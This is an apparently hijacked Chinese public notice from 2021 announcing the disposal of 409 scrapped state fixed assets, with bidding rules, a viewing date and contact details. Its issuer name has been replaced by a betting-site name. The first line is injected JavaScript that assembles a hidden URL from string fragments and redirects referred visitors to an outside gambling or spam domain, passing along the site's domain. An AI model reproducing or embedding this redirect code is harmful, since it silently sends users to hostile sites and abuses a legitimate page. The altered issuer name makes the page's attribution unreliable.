var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 通知公告

中国竞彩网机关关于公开处置报废固定资产的公告


发布日期:2021-04-29 08:05来源:办公室 阅读次数:

  根据《河南省省级行政事业单位国有资产处置管理暂行办法》规定和省财政厅《关于省科技厅机关和所属单位处置资产调整账务的批复》(豫财资[2021]76号),中国竞彩网机关决定对财政已批复的报废固定资产进行公开处置,现将有关事宜公告如下:

  一、待处置报废固定资产基本情况

  本次公开处置资产数量总计为409项,账面原值:1476467.50元。其中:家具用具装具类98项;通用设备类171项;专用设备类4项;土地房屋及构筑物1项(具体明细见附件),实物状况以现场点算为准。

  二、竞买方资格条件

  具备回收处置固定资产(含电器、电子产品处置)资质的法人或者其他组织。

  三、交易方式

  1、公告期满后,如未征集到意向竞买方或不足三家时不延长征集期限,征集到期日自行取消本次处置。

  2、现场查看。公告期满后,各意向竞买方派一名代表,携带意向竞买方的营业执照、税务登记证(正副本)、组织机构代码证、相关资质证明复印证并加盖公章以及本人身份证原件及复印件、法人代表委托书原件等资料,按指定时间到达指定地点进行现场看样。不接受提前或延后现场看样的要求。

  3、统一竞价。各意向竞买方在看样后,立即对处置标的进行应价,所有意向竞买方应价结束后统一拆封竞价,以应价最高且应价高于现场公布的最低价格的方式确定中标方。

  四、交易条件

  1、处置标的按现状处置。

  2、运费及装卸等一切费用由竞买方自行承担。

  3、物品搬运时必须遵守中国竞彩网相关管理规定。

  五、本公告期限

  自2021年4月29日至2021年5月6日止。欢迎符合本公告资质要求的供应商来电咨询。

  六、现场查看及评估时间、地点

  时间:2021年5月7日9:00-12:00

  地点:郑州市金水区政三街4号

  联 系 人:李经烨 张向峰

  联系方式:13513713929 13939018979

  附件:1.《关于省科技厅机关和所属单位处置资产调整账务的批复》(豫财资[2021]76号)

     2. 资产处置申报表

中国竞彩网

2021年4月29日